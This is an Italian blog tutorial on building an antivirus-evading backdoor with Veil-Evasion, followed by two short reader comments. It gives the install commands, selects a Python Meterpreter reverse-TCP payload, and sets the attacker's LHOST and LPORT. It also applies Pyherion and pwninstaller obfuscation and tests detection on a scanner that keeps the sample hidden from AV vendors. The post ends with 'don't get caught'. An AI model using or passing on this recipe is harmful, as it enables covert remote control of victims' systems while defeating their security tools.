I pentester di tutto il mondo lo sanno, avere accesso remoto ad un sistema bypassando i controlli di sicurezza è il loro compito. Disporre di una componente che permetta di aprire una remote shell su un sistema in modo che gli antivirus non se ne accorgano è un ottimo passo verso la conquista della vittima.

Esistono diveri tool in rete che aiutano a creare questo tipo di backdoor, oggi vi illustrerò il funzionamento di veil-evasion.

Per utilizzarlo ci serve una macchina linux, nel mio caso ho utilizzato una macchina virtuale Kali Linux. Per installarlo occorre dare i seguenti comandi

 

apt-get update

apt-get install veil-evasion

Dopo l’installazione è sufficiente lanciare il comando veil-evasion per trovarsi di fronte all’interfaccia di amministrazione

Si tratta quindi di un framework che ci permette di fare un bel po’ di cose interessanti.

Iniziamo con il comando “list”, che dà in output l’elenco dei payload disponibili:

Nel mio test lo scopo era creare una reverse tcp da poter utilizzare con meterpreter, selezioni quindi il payload  python/meterpreter/rev_tcp digitando il numero 34.

A questo punto Veil propone una schermata delle opzioni configurabili

Dovremo quindi procedere ad impostare le opzioni come segue

set LHOST <ip address of the kali liux machine>

set LPORT <tcp port being used>

set USE_PYHERION Y

generate

Ovviamente dovremo inserire l’indirizzo IP della nostra macchina metasploit in corrispondenza di set LHOST e la porta su cui il nostro meterpreter è in ascolto sul comando set LPORT.

Il comando generate consentirà la creazione del file contenente la nostra backdoor, dandoci la possibilità di assegnargli un nome, inoltre ci verrà proposto l’uso evetuale di un offuscatore. In genere io uso sempre l’opzione numero 2, ovvero  pwninstaller, il quale risulta essere molto efficace.

Dopo un breve periodo di attesa il nostro malware sarà pronto e depositato nella directory /usr/share/veil-output/compiled.

Se volete testare l’invisibilità agli antivirus vi consiglio di usare il portale http://nodostribute.com in quanto i risultati dello scan non vengono condivisi con i vendor e quindi il vostro o-day rimarrà tale.

Ecco il risultato dello scan del malware che ho creato:

Ovviamente è possibile che il motore euristico di alcuni AV rilevi l’anomalia, non si tratta di qualcosa perfettamente invisibile, ma quasi.

Adesso si tratta solo di configurare il nostro metasploit in ascolto sulla porta che abbiamo deciso in precedenza ed il gioco è fatto.

Ho già spiegato in un post precedente come utilizzare il modulo exploit/multi/handler di metasploit per creare un listener, non mi dilungherò quindi nella spiegazione.

Ricordatevi di non farvi beccare e soprattutto di non usare queste nozioni per qualcosa di illegale!

 

 

3 thoughts on “Come creare una backdoor invisibile agli antivirus in pochi minuti

  1. che fastidio, di solito uso una raspberry con raspbian installato per comodità, ma per molte cose è troppo poco potente… Tipo per veil-evasion…

    1. Veil-evasion richiede una potenza computazionale impegnativa per un raspberry. Mettersi in listen su una porta tcp però è uno dei lavori che riesce a fare bene

Rispondi

%d blogger hanno fatto clic su Mi Piace per questo: